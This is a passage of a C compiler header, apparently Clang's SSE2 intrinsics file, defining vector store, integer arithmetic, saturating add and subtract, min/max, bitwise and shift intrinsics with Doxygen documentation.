/// This intrinsic corresponds to the &lt;c&gt;VMOVAPD / MOVAPS&lt;/c&gt; instruction.
///
/// \param __dp
///    A pointer to an aligned memory location that can store two
///    double-precision values.
/// \param __a
///    A packed 128-bit vector of [2 x double] containing the values to be
///    moved.
static __inline__ void __DEFAULT_FN_ATTRS _mm_store_pd(double *__dp,
                                                       __m128d __a) {
  *(__m128d *)__dp = __a;
}

/// Moves the lower 64 bits of a 128-bit vector of [2 x double] twice to
///    the upper and lower 64 bits of a memory location.
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// This intrinsic corresponds to the
///   &lt;c&gt; VMOVDDUP + VMOVAPD / MOVLHPS + MOVAPS &lt;/c&gt; instruction.
///
/// \param __dp
///    A pointer to a memory location that can store two double-precision
///    values.
/// \param __a
///    A 128-bit vector of [2 x double] whose lower 64 bits are copied to each
///    of the values in \a __dp.
static __inline__ void __DEFAULT_FN_ATTRS _mm_store1_pd(double *__dp,
                                                        __m128d __a) {
  __a = __builtin_shufflevector((__v2df)__a, (__v2df)__a, 0, 0);
  _mm_store_pd(__dp, __a);
}

/// Moves the lower 64 bits of a 128-bit vector of [2 x double] twice to
///    the upper and lower 64 bits of a memory location.
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// This intrinsic corresponds to the
///   &lt;c&gt; VMOVDDUP + VMOVAPD / MOVLHPS + MOVAPS &lt;/c&gt; instruction.
///
/// \param __dp
///    A pointer to a memory location that can store two double-precision
///    values.
/// \param __a
///    A 128-bit vector of [2 x double] whose lower 64 bits are copied to each
///    of the values in \a __dp.
static __inline__ void __DEFAULT_FN_ATTRS _mm_store_pd1(double *__dp,
                                                        __m128d __a) {
  _mm_store1_pd(__dp, __a);
}

/// Stores a 128-bit vector of [2 x double] into an unaligned memory
///    location.
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// This intrinsic corresponds to the &lt;c&gt; VMOVUPD / MOVUPD &lt;/c&gt; instruction.
///
/// \param __dp
///    A pointer to a 128-bit memory location. The address of the memory
///    location does not have to be aligned.
/// \param __a
///    A 128-bit vector of [2 x double] containing the values to be stored.
static __inline__ void __DEFAULT_FN_ATTRS _mm_storeu_pd(double *__dp,
                                                        __m128d __a) {
  struct __storeu_pd {
    __m128d_u __v;
  } __attribute__((__packed__, __may_alias__));
  ((struct __storeu_pd *)__dp)-&gt;__v = __a;
}

/// Stores two double-precision values, in reverse order, from a 128-bit
///    vector of [2 x double] to a 16-byte aligned memory location.
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// This intrinsic corresponds to a shuffling instruction followed by a
/// &lt;c&gt; VMOVAPD / MOVAPD &lt;/c&gt; instruction.
///
/// \param __dp
///    A pointer to a 16-byte aligned memory location that can store two
///    double-precision values.
/// \param __a
///    A 128-bit vector of [2 x double] containing the values to be reversed and
///    stored.
static __inline__ void __DEFAULT_FN_ATTRS _mm_storer_pd(double *__dp,
                                                        __m128d __a) {
  __a = __builtin_shufflevector((__v2df)__a, (__v2df)__a, 1, 0);
  *(__m128d *)__dp = __a;
}

/// Stores the upper 64 bits of a 128-bit vector of [2 x double] to a
///    memory location.
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// This intrinsic corresponds to the &lt;c&gt; VMOVHPD / MOVHPD &lt;/c&gt; instruction.
///
/// \param __dp
///    A pointer to a 64-bit memory location.
/// \param __a
///    A 128-bit vector of [2 x double] containing the value to be stored.
static __inline__ void __DEFAULT_FN_ATTRS _mm_storeh_pd(double *__dp,
                                                        __m128d __a) {
  struct __mm_storeh_pd_struct {
    double __u;
  } __attribute__((__packed__, __may_alias__));
  ((struct __mm_storeh_pd_struct *)__dp)-&gt;__u = __a[1];
}

/// Stores the lower 64 bits of a 128-bit vector of [2 x double] to a
///    memory location.
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// This intrinsic corresponds to the &lt;c&gt; VMOVLPD / MOVLPD &lt;/c&gt; instruction.
///
/// \param __dp
///    A pointer to a 64-bit memory location.
/// \param __a
///    A 128-bit vector of [2 x double] containing the value to be stored.
static __inline__ void __DEFAULT_FN_ATTRS _mm_storel_pd(double *__dp,
                                                        __m128d __a) {
  struct __mm_storeh_pd_struct {
    double __u;
  } __attribute__((__packed__, __may_alias__));
  ((struct __mm_storeh_pd_struct *)__dp)-&gt;__u = __a[0];
}

/// Adds the corresponding elements of two 128-bit vectors of [16 x i8],
///    saving the lower 8 bits of each sum in the corresponding element of a
///    128-bit result vector of [16 x i8].
///
///    The integer elements of both parameters can be either signed or unsigned.
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// This intrinsic corresponds to the &lt;c&gt; VPADDB / PADDB &lt;/c&gt; instruction.
///
/// \param __a
///    A 128-bit vector of [16 x i8].
/// \param __b
///    A 128-bit vector of [16 x i8].
/// \returns A 128-bit vector of [16 x i8] containing the sums of both
///    parameters.
static __inline__ __m128i __DEFAULT_FN_ATTRS _mm_add_epi8(__m128i __a,
                                                          __m128i __b) {
  return (__m128i)((__v16qu)__a + (__v16qu)__b);
}

/// Adds the corresponding elements of two 128-bit vectors of [8 x i16],
///    saving the lower 16 bits of each sum in the corresponding element of a
///    128-bit result vector of [8 x i16].
///
///    The integer elements of both parameters can be either signed or unsigned.
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// This intrinsic corresponds to the &lt;c&gt; VPADDW / PADDW &lt;/c&gt; instruction.
///
/// \param __a
///    A 128-bit vector of [8 x i16].
/// \param __b
///    A 128-bit vector of [8 x i16].
/// \returns A 128-bit vector of [8 x i16] containing the sums of both
///    parameters.
static __inline__ __m128i __DEFAULT_FN_ATTRS _mm_add_epi16(__m128i __a,
                                                           __m128i __b) {
  return (__m128i)((__v8hu)__a + (__v8hu)__b);
}

/// Adds the corresponding elements of two 128-bit vectors of [4 x i32],
///    saving the lower 32 bits of each sum in the corresponding element of a
///    128-bit result vector of [4 x i32].
///
///    The integer elements of both parameters can be either signed or unsigned.
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// This intrinsic corresponds to the &lt;c&gt; VPADDD / PADDD &lt;/c&gt; instruction.
///
/// \param __a
///    A 128-bit vector of [4 x i32].
/// \param __b
///    A 128-bit vector of [4 x i32].
/// \returns A 128-bit vector of [4 x i32] containing the sums of both
///    parameters.
static __inline__ __m128i __DEFAULT_FN_ATTRS_CONSTEXPR
_mm_add_epi32(__m128i __a, __m128i __b) {
  return (__m128i)((__v4su)__a + (__v4su)__b);
}

/// Adds two signed or unsigned 64-bit integer values, returning the
///    lower 64 bits of the sum.
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// This intrinsic corresponds to the &lt;c&gt; PADDQ &lt;/c&gt; instruction.
///
/// \param __a
///    A 64-bit integer.
/// \param __b
///    A 64-bit integer.
/// \returns A 64-bit integer containing the sum of both parameters.
static __inline__ __m64 __DEFAULT_FN_ATTRS _mm_add_si64(__m64 __a, __m64 __b) {
  return (__m64)(((unsigned long long)__a) + ((unsigned long long)__b));
}

/// Adds the corresponding elements of two 128-bit vectors of [2 x i64],
///    saving the lower 64 bits of each sum in the corresponding element of a
///    128-bit result vector of [2 x i64].
///
///    The integer elements of both parameters can be either signed or unsigned.
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// This intrinsic corresponds to the &lt;c&gt; VPADDQ / PADDQ &lt;/c&gt; instruction.
///
/// \param __a
///    A 128-bit vector of [2 x i64].
/// \param __b
///    A 128-bit vector of [2 x i64].
/// \returns A 128-bit vector of [2 x i64] containing the sums of both
///    parameters.
static __inline__ __m128i __DEFAULT_FN_ATTRS_CONSTEXPR
_mm_add_epi64(__m128i __a, __m128i __b) {
  return (__m128i)((__v2du)__a + (__v2du)__b);
}

/// Adds, with saturation, the corresponding elements of two 128-bit
///    signed [16 x i8] vectors, saving each sum in the corresponding element
///    of a 128-bit result vector of [16 x i8].
///
///    Positive sums greater than 0x7F are saturated to 0x7F. Negative sums
///    less than 0x80 are saturated to 0x80.
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// This intrinsic corresponds to the &lt;c&gt; VPADDSB / PADDSB &lt;/c&gt; instruction.
///
/// \param __a
///    A 128-bit signed [16 x i8] vector.
/// \param __b
///    A 128-bit signed [16 x i8] vector.
/// \returns A 128-bit signed [16 x i8] vector containing the saturated sums of
///    both parameters.
static __inline__ __m128i __DEFAULT_FN_ATTRS _mm_adds_epi8(__m128i __a,
                                                           __m128i __b) {
  return (__m128i)__builtin_elementwise_add_sat((__v16qs)__a, (__v16qs)__b);
}

/// Adds, with saturation, the corresponding elements of two 128-bit
///    signed [8 x i16] vectors, saving each sum in the corresponding element
///    of a 128-bit result vector of [8 x i16].
///
///    Positive sums greater than 0x7FFF are saturated to 0x7FFF. Negative sums
///    less than 0x8000 are saturated to 0x8000.
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// This intrinsic corresponds to the &lt;c&gt; VPADDSW / PADDSW &lt;/c&gt; instruction.
///
/// \param __a
///    A 128-bit signed [8 x i16] vector.
/// \param __b
///    A 128-bit signed [8 x i16] vector.
/// \returns A 128-bit signed [8 x i16] vector containing the saturated sums of
///    both parameters.
static __inline__ __m128i __DEFAULT_FN_ATTRS _mm_adds_epi16(__m128i __a,
                                                            __m128i __b) {
  return (__m128i)__builtin_elementwise_add_sat((__v8hi)__a, (__v8hi)__b);
}

/// Adds, with saturation, the corresponding elements of two 128-bit
///    unsigned [16 x i8] vectors, saving each sum in the corresponding element
///    of a 128-bit result vector of [16 x i8].
///
///    Positive sums greater than 0xFF are saturated to 0xFF. Negative sums are
///    saturated to 0x00.
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// This intrinsic corresponds to the &lt;c&gt; VPADDUSB / PADDUSB &lt;/c&gt; instruction.
///
/// \param __a
///    A 128-bit unsigned [16 x i8] vector.
/// \param __b
///    A 128-bit unsigned [16 x i8] vector.
/// \returns A 128-bit unsigned [16 x i8] vector containing the saturated sums
///    of both parameters.
static __inline__ __m128i __DEFAULT_FN_ATTRS _mm_adds_epu8(__m128i __a,
                                                           __m128i __b) {
  return (__m128i)__builtin_elementwise_add_sat((__v16qu)__a, (__v16qu)__b);
}

/// Adds, with saturation, the corresponding elements of two 128-bit
///    unsigned [8 x i16] vectors, saving each sum in the corresponding element
///    of a 128-bit result vector of [8 x i16].
///
///    Positive sums greater than 0xFFFF are saturated to 0xFFFF. Negative sums
///    are saturated to 0x0000.
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// This intrinsic corresponds to the &lt;c&gt; VPADDUSB / PADDUSB &lt;/c&gt; instruction.
///
/// \param __a
///    A 128-bit unsigned [8 x i16] vector.
/// \param __b
///    A 128-bit unsigned [8 x i16] vector.
/// \returns A 128-bit unsigned [8 x i16] vector containing the saturated sums
///    of both parameters.
static __inline__ __m128i __DEFAULT_FN_ATTRS _mm_adds_epu16(__m128i __a,
                                                            __m128i __b) {
  return (__m128i)__builtin_elementwise_add_sat((__v8hu)__a, (__v8hu)__b);
}

/// Computes the rounded averages of corresponding elements of two
///    128-bit unsigned [16 x i8] vectors, saving each result in the
///    corresponding element of a 128-bit result vector of [16 x i8].
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// This intrinsic corresponds to the &lt;c&gt; VPAVGB / PAVGB &lt;/c&gt; instruction.
///
/// \param __a
///    A 128-bit unsigned [16 x i8] vector.
/// \param __b
///    A 128-bit unsigned [16 x i8] vector.
/// \returns A 128-bit unsigned [16 x i8] vector containing the rounded
///    averages of both parameters.
static __inline__ __m128i __DEFAULT_FN_ATTRS _mm_avg_epu8(__m128i __a,
                                                          __m128i __b) {
  return (__m128i)__builtin_ia32_pavgb128((__v16qi)__a, (__v16qi)__b);
}

/// Computes the rounded averages of corresponding elements of two
///    128-bit unsigned [8 x i16] vectors, saving each result in the
///    corresponding element of a 128-bit result vector of [8 x i16].
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// This intrinsic corresponds to the &lt;c&gt; VPAVGW / PAVGW &lt;/c&gt; instruction.
///
/// \param __a
///    A 128-bit unsigned [8 x i16] vector.
/// \param __b
///    A 128-bit unsigned [8 x i16] vector.
/// \returns A 128-bit unsigned [8 x i16] vector containing the rounded
///    averages of both parameters.
static __inline__ __m128i __DEFAULT_FN_ATTRS _mm_avg_epu16(__m128i __a,
                                                           __m128i __b) {
  return (__m128i)__builtin_ia32_pavgw128((__v8hi)__a, (__v8hi)__b);
}

/// Multiplies the corresponding elements of two 128-bit signed [8 x i16]
///    vectors, producing eight intermediate 32-bit signed integer products, and
///    adds the consecutive pairs of 32-bit products to form a 128-bit signed
///    [4 x i32] vector.
///
///    For example, bits [15:0] of both parameters are multiplied producing a
///    32-bit product, bits [31:16] of both parameters are multiplied producing
///    a 32-bit product, and the sum of those two products becomes bits [31:0]
///    of the result.
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// This intrinsic corresponds to the &lt;c&gt; VPMADDWD / PMADDWD &lt;/c&gt; instruction.
///
/// \param __a
///    A 128-bit signed [8 x i16] vector.
/// \param __b
///    A 128-bit signed [8 x i16] vector.
/// \returns A 128-bit signed [4 x i32] vector containing the sums of products
///    of both parameters.
static __inline__ __m128i __DEFAULT_FN_ATTRS _mm_madd_epi16(__m128i __a,
                                                            __m128i __b) {
  return (__m128i)__builtin_ia32_pmaddwd128((__v8hi)__a, (__v8hi)__b);
}

/// Compares corresponding elements of two 128-bit signed [8 x i16]
///    vectors, saving the greater value from each comparison in the
///    corresponding element of a 128-bit result vector of [8 x i16].
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// This intrinsic corresponds to the &lt;c&gt; VPMAXSW / PMAXSW &lt;/c&gt; instruction.
///
/// \param __a
///    A 128-bit signed [8 x i16] vector.
/// \param __b
///    A 128-bit signed [8 x i16] vector.
/// \returns A 128-bit signed [8 x i16] vector containing the greater value of
///    each comparison.
static __inline__ __m128i __DEFAULT_FN_ATTRS _mm_max_epi16(__m128i __a,
                                                           __m128i __b) {
  return (__m128i)__builtin_elementwise_max((__v8hi)__a, (__v8hi)__b);
}

/// Compares corresponding elements of two 128-bit unsigned [16 x i8]
///    vectors, saving the greater value from each comparison in the
///    corresponding element of a 128-bit result vector of [16 x i8].
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// This intrinsic corresponds to the &lt;c&gt; VPMAXUB / PMAXUB &lt;/c&gt; instruction.
///
/// \param __a
///    A 128-bit unsigned [16 x i8] vector.
/// \param __b
///    A 128-bit unsigned [16 x i8] vector.
/// \returns A 128-bit unsigned [16 x i8] vector containing the greater value of
///    each comparison.
static __inline__ __m128i __DEFAULT_FN_ATTRS _mm_max_epu8(__m128i __a,
                                                          __m128i __b) {
  return (__m128i)__builtin_elementwise_max((__v16qu)__a, (__v16qu)__b);
}

/// Compares corresponding elements of two 128-bit signed [8 x i16]
///    vectors, saving the smaller value from each comparison in the
///    corresponding element of a 128-bit result vector of [8 x i16].
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// This intrinsic corresponds to the &lt;c&gt; VPMINSW / PMINSW &lt;/c&gt; instruction.
///
/// \param __a
///    A 128-bit signed [8 x i16] vector.
/// \param __b
///    A 128-bit signed [8 x i16] vector.
/// \returns A 128-bit signed [8 x i16] vector containing the smaller value of
///    each comparison.
static __inline__ __m128i __DEFAULT_FN_ATTRS _mm_min_epi16(__m128i __a,
                                                           __m128i __b) {
  return (__m128i)__builtin_elementwise_min((__v8hi)__a, (__v8hi)__b);
}

/// Compares corresponding elements of two 128-bit unsigned [16 x i8]
///    vectors, saving the smaller value from each comparison in the
///    corresponding element of a 128-bit result vector of [16 x i8].
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// This intrinsic corresponds to the &lt;c&gt; VPMINUB / PMINUB &lt;/c&gt; instruction.
///
/// \param __a
///    A 128-bit unsigned [16 x i8] vector.
/// \param __b
///    A 128-bit unsigned [16 x i8] vector.
/// \returns A 128-bit unsigned [16 x i8] vector containing the smaller value of
///    each comparison.
static __inline__ __m128i __DEFAULT_FN_ATTRS _mm_min_epu8(__m128i __a,
                                                          __m128i __b) {
  return (__m128i)__builtin_elementwise_min((__v16qu)__a, (__v16qu)__b);
}

/// Multiplies the corresponding elements of two signed [8 x i16]
///    vectors, saving the upper 16 bits of each 32-bit product in the
///    corresponding element of a 128-bit signed [8 x i16] result vector.
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// This intrinsic corresponds to the &lt;c&gt; VPMULHW / PMULHW &lt;/c&gt; instruction.
///
/// \param __a
///    A 128-bit signed [8 x i16] vector.
/// \param __b
///    A 128-bit signed [8 x i16] vector.
/// \returns A 128-bit signed [8 x i16] vector containing the upper 16 bits of
///    each of the eight 32-bit products.
static __inline__ __m128i __DEFAULT_FN_ATTRS _mm_mulhi_epi16(__m128i __a,
                                                             __m128i __b) {
  return (__m128i)__builtin_ia32_pmulhw128((__v8hi)__a, (__v8hi)__b);
}

/// Multiplies the corresponding elements of two unsigned [8 x i16]
///    vectors, saving the upper 16 bits of each 32-bit product in the
///    corresponding element of a 128-bit unsigned [8 x i16] result vector.
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// This intrinsic corresponds to the &lt;c&gt; VPMULHUW / PMULHUW &lt;/c&gt; instruction.
///
/// \param __a
///    A 128-bit unsigned [8 x i16] vector.
/// \param __b
///    A 128-bit unsigned [8 x i16] vector.
/// \returns A 128-bit unsigned [8 x i16] vector containing the upper 16 bits
///    of each of the eight 32-bit products.
static __inline__ __m128i __DEFAULT_FN_ATTRS _mm_mulhi_epu16(__m128i __a,
                                                             __m128i __b) {
  return (__m128i)__builtin_ia32_pmulhuw128((__v8hi)__a, (__v8hi)__b);
}

/// Multiplies the corresponding elements of two signed [8 x i16]
///    vectors, saving the lower 16 bits of each 32-bit product in the
///    corresponding element of a 128-bit signed [8 x i16] result vector.
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// This intrinsic corresponds to the &lt;c&gt; VPMULLW / PMULLW &lt;/c&gt; instruction.
///
/// \param __a
///    A 128-bit signed [8 x i16] vector.
/// \param __b
///    A 128-bit signed [8 x i16] vector.
/// \returns A 128-bit signed [8 x i16] vector containing the lower 16 bits of
///    each of the eight 32-bit products.
static __inline__ __m128i __DEFAULT_FN_ATTRS _mm_mullo_epi16(__m128i __a,
                                                             __m128i __b) {
  return (__m128i)((__v8hu)__a * (__v8hu)__b);
}

/// Multiplies 32-bit unsigned integer values contained in the lower bits
///    of the two 64-bit integer vectors and returns the 64-bit unsigned
///    product.
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// This intrinsic corresponds to the &lt;c&gt; PMULUDQ &lt;/c&gt; instruction.
///
/// \param __a
///    A 64-bit integer containing one of the source operands.
/// \param __b
///    A 64-bit integer containing one of the source operands.
/// \returns A 64-bit integer vector containing the product of both operands.
static __inline__ __m64 __DEFAULT_FN_ATTRS _mm_mul_su32(__m64 __a, __m64 __b) {
  return __trunc64(__builtin_ia32_pmuludq128((__v4si)__anyext128(__a),
                                             (__v4si)__anyext128(__b)));
}

/// Multiplies 32-bit unsigned integer values contained in the lower
///    bits of the corresponding elements of two [2 x i64] vectors, and returns
///    the 64-bit products in the corresponding elements of a [2 x i64] vector.
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// This intrinsic corresponds to the &lt;c&gt; VPMULUDQ / PMULUDQ &lt;/c&gt; instruction.
///
/// \param __a
///    A [2 x i64] vector containing one of the source operands.
/// \param __b
///    A [2 x i64] vector containing one of the source operands.
/// \returns A [2 x i64] vector containing the product of both operands.
static __inline__ __m128i __DEFAULT_FN_ATTRS _mm_mul_epu32(__m128i __a,
                                                           __m128i __b) {
  return __builtin_ia32_pmuludq128((__v4si)__a, (__v4si)__b);
}

/// Computes the absolute differences of corresponding 8-bit integer
///    values in two 128-bit vectors. Sums the first 8 absolute differences, and
///    separately sums the second 8 absolute differences. Packs these two
///    unsigned 16-bit integer sums into the upper and lower elements of a
///    [2 x i64] vector.
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// This intrinsic corresponds to the &lt;c&gt; VPSADBW / PSADBW &lt;/c&gt; instruction.
///
/// \param __a
///    A 128-bit integer vector containing one of the source operands.
/// \param __b
///    A 128-bit integer vector containing one of the source operands.
/// \returns A [2 x i64] vector containing the sums of the sets of absolute
///    differences between both operands.
static __inline__ __m128i __DEFAULT_FN_ATTRS _mm_sad_epu8(__m128i __a,
                                                          __m128i __b) {
  return __builtin_ia32_psadbw128((__v16qi)__a, (__v16qi)__b);
}

/// Subtracts the corresponding 8-bit integer values in the operands.
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// This intrinsic corresponds to the &lt;c&gt; VPSUBB / PSUBB &lt;/c&gt; instruction.
///
/// \param __a
///    A 128-bit integer vector containing the minuends.
/// \param __b
///    A 128-bit integer vector containing the subtrahends.
/// \returns A 128-bit integer vector containing the differences of the values
///    in the operands.
static __inline__ __m128i __DEFAULT_FN_ATTRS _mm_sub_epi8(__m128i __a,
                                                          __m128i __b) {
  return (__m128i)((__v16qu)__a - (__v16qu)__b);
}

/// Subtracts the corresponding 16-bit integer values in the operands.
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// This intrinsic corresponds to the &lt;c&gt; VPSUBW / PSUBW &lt;/c&gt; instruction.
///
/// \param __a
///    A 128-bit integer vector containing the minuends.
/// \param __b
///    A 128-bit integer vector containing the subtrahends.
/// \returns A 128-bit integer vector containing the differences of the values
///    in the operands.
static __inline__ __m128i __DEFAULT_FN_ATTRS _mm_sub_epi16(__m128i __a,
                                                           __m128i __b) {
  return (__m128i)((__v8hu)__a - (__v8hu)__b);
}

/// Subtracts the corresponding 32-bit integer values in the operands.
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// This intrinsic corresponds to the &lt;c&gt; VPSUBD / PSUBD &lt;/c&gt; instruction.
///
/// \param __a
///    A 128-bit integer vector containing the minuends.
/// \param __b
///    A 128-bit integer vector containing the subtrahends.
/// \returns A 128-bit integer vector containing the differences of the values
///    in the operands.
static __inline__ __m128i __DEFAULT_FN_ATTRS_CONSTEXPR
_mm_sub_epi32(__m128i __a, __m128i __b) {
  return (__m128i)((__v4su)__a - (__v4su)__b);
}

/// Subtracts signed or unsigned 64-bit integer values and writes the
///    difference to the corresponding bits in the destination.
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// This intrinsic corresponds to the &lt;c&gt; PSUBQ &lt;/c&gt; instruction.
///
/// \param __a
///    A 64-bit integer vector containing the minuend.
/// \param __b
///    A 64-bit integer vector containing the subtrahend.
/// \returns A 64-bit integer vector containing the difference of the values in
///    the operands.
static __inline__ __m64 __DEFAULT_FN_ATTRS _mm_sub_si64(__m64 __a, __m64 __b) {
  return (__m64)((unsigned long long)__a - (unsigned long long)__b);
}

/// Subtracts the corresponding elements of two [2 x i64] vectors.
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// This intrinsic corresponds to the &lt;c&gt; VPSUBQ / PSUBQ &lt;/c&gt; instruction.
///
/// \param __a
///    A 128-bit integer vector containing the minuends.
/// \param __b
///    A 128-bit integer vector containing the subtrahends.
/// \returns A 128-bit integer vector containing the differences of the values
///    in the operands.
static __inline__ __m128i __DEFAULT_FN_ATTRS_CONSTEXPR
_mm_sub_epi64(__m128i __a, __m128i __b) {
  return (__m128i)((__v2du)__a - (__v2du)__b);
}

/// Subtracts, with saturation, corresponding 8-bit signed integer values in
///    the input and returns the differences in the corresponding bytes in the
///    destination.
///
///    Differences greater than 0x7F are saturated to 0x7F, and differences
///    less than 0x80 are saturated to 0x80.
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// This intrinsic corresponds to the &lt;c&gt; VPSUBSB / PSUBSB &lt;/c&gt; instruction.
///
/// \param __a
///    A 128-bit integer vector containing the minuends.
/// \param __b
///    A 128-bit integer vector containing the subtrahends.
/// \returns A 128-bit integer vector containing the differences of the values
///    in the operands.
static __inline__ __m128i __DEFAULT_FN_ATTRS _mm_subs_epi8(__m128i __a,
                                                           __m128i __b) {
  return (__m128i)__builtin_elementwise_sub_sat((__v16qs)__a, (__v16qs)__b);
}

/// Subtracts, with saturation, corresponding 16-bit signed integer values in
///    the input and returns the differences in the corresponding bytes in the
///    destination.
///
///    Differences greater than 0x7FFF are saturated to 0x7FFF, and values less
///    than 0x8000 are saturated to 0x8000.
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// This intrinsic corresponds to the &lt;c&gt; VPSUBSW / PSUBSW &lt;/c&gt; instruction.
///
/// \param __a
///    A 128-bit integer vector containing the minuends.
/// \param __b
///    A 128-bit integer vector containing the subtrahends.
/// \returns A 128-bit integer vector containing the differences of the values
///    in the operands.
static __inline__ __m128i __DEFAULT_FN_ATTRS _mm_subs_epi16(__m128i __a,
                                                            __m128i __b) {
  return (__m128i)__builtin_elementwise_sub_sat((__v8hi)__a, (__v8hi)__b);
}

/// Subtracts, with saturation, corresponding 8-bit unsigned integer values in
///    the input and returns the differences in the corresponding bytes in the
///    destination.
///
///    Differences less than 0x00 are saturated to 0x00.
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// This intrinsic corresponds to the &lt;c&gt; VPSUBUSB / PSUBUSB &lt;/c&gt; instruction.
///
/// \param __a
///    A 128-bit integer vector containing the minuends.
/// \param __b
///    A 128-bit integer vector containing the subtrahends.
/// \returns A 128-bit integer vector containing the unsigned integer
///    differences of the values in the operands.
static __inline__ __m128i __DEFAULT_FN_ATTRS _mm_subs_epu8(__m128i __a,
                                                           __m128i __b) {
  return (__m128i)__builtin_elementwise_sub_sat((__v16qu)__a, (__v16qu)__b);
}

/// Subtracts, with saturation, corresponding 16-bit unsigned integer values in
///    the input and returns the differences in the corresponding bytes in the
///    destination.
///
///    Differences less than 0x0000 are saturated to 0x0000.
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// This intrinsic corresponds to the &lt;c&gt; VPSUBUSW / PSUBUSW &lt;/c&gt; instruction.
///
/// \param __a
///    A 128-bit integer vector containing the minuends.
/// \param __b
///    A 128-bit integer vector containing the subtrahends.
/// \returns A 128-bit integer vector containing the unsigned integer
///    differences of the values in the operands.
static __inline__ __m128i __DEFAULT_FN_ATTRS _mm_subs_epu16(__m128i __a,
                                                            __m128i __b) {
  return (__m128i)__builtin_elementwise_sub_sat((__v8hu)__a, (__v8hu)__b);
}

/// Performs a bitwise AND of two 128-bit integer vectors.
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// This intrinsic corresponds to the &lt;c&gt; VPAND / PAND &lt;/c&gt; instruction.
///
/// \param __a
///    A 128-bit integer vector containing one of the source operands.
/// \param __b
///    A 128-bit integer vector containing one of the source operands.
/// \returns A 128-bit integer vector containing the bitwise AND of the values
///    in both operands.
static __inline__ __m128i __DEFAULT_FN_ATTRS _mm_and_si128(__m128i __a,
                                                           __m128i __b) {
  return (__m128i)((__v2du)__a &amp; (__v2du)__b);
}

/// Performs a bitwise AND of two 128-bit integer vectors, using the
///    one's complement of the values contained in the first source operand.
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// This intrinsic corresponds to the &lt;c&gt; VPANDN / PANDN &lt;/c&gt; instruction.
///
/// \param __a
///    A 128-bit vector containing the left source operand. The one's complement
///    of this value is used in the bitwise AND.
/// \param __b
///    A 128-bit vector containing the right source operand.
/// \returns A 128-bit integer vector containing the bitwise AND of the one's
///    complement of the first operand and the values in the second operand.
static __inline__ __m128i __DEFAULT_FN_ATTRS _mm_andnot_si128(__m128i __a,
                                                              __m128i __b) {
  return (__m128i)(~(__v2du)__a &amp; (__v2du)__b);
}
/// Performs a bitwise OR of two 128-bit integer vectors.
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// This intrinsic corresponds to the &lt;c&gt; VPOR / POR &lt;/c&gt; instruction.
///
/// \param __a
///    A 128-bit integer vector containing one of the source operands.
/// \param __b
///    A 128-bit integer vector containing one of the source operands.
/// \returns A 128-bit integer vector containing the bitwise OR of the values
///    in both operands.
static __inline__ __m128i __DEFAULT_FN_ATTRS _mm_or_si128(__m128i __a,
                                                          __m128i __b) {
  return (__m128i)((__v2du)__a | (__v2du)__b);
}

/// Performs a bitwise exclusive OR of two 128-bit integer vectors.
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// This intrinsic corresponds to the &lt;c&gt; VPXOR / PXOR &lt;/c&gt; instruction.
///
/// \param __a
///    A 128-bit integer vector containing one of the source operands.
/// \param __b
///    A 128-bit integer vector containing one of the source operands.
/// \returns A 128-bit integer vector containing the bitwise exclusive OR of the
///    values in both operands.
static __inline__ __m128i __DEFAULT_FN_ATTRS _mm_xor_si128(__m128i __a,
                                                           __m128i __b) {
  return (__m128i)((__v2du)__a ^ (__v2du)__b);
}

/// Left-shifts the 128-bit integer vector operand by the specified
///    number of bytes. Low-order bits are cleared.
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// \code
/// __m128i _mm_slli_si128(__m128i a, const int imm);
/// \endcode
///
/// This intrinsic corresponds to the &lt;c&gt; VPSLLDQ / PSLLDQ &lt;/c&gt; instruction.
///
/// \param a
///    A 128-bit integer vector containing the source operand.
/// \param imm
///    An immediate value specifying the number of bytes to left-shift operand
///    \a a.
/// \returns A 128-bit integer vector containing the left-shifted value.
#define _mm_slli_si128(a, imm)                                                 \
  ((__m128i)__builtin_ia32_pslldqi128_byteshift((__v2di)(__m128i)(a),          \
                                                (int)(imm)))

#define _mm_bslli_si128(a, imm)                                                \
  ((__m128i)__builtin_ia32_pslldqi128_byteshift((__v2di)(__m128i)(a),          \
                                                (int)(imm)))

/// Left-shifts each 16-bit value in the 128-bit integer vector operand
///    by the specified number of bits. Low-order bits are cleared.
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// This intrinsic corresponds to the &lt;c&gt; VPSLLW / PSLLW &lt;/c&gt; instruction.
///
/// \param __a
///    A 128-bit integer vector containing the source operand.
/// \param __count
///    An integer value specifying the number of bits to left-shift each value
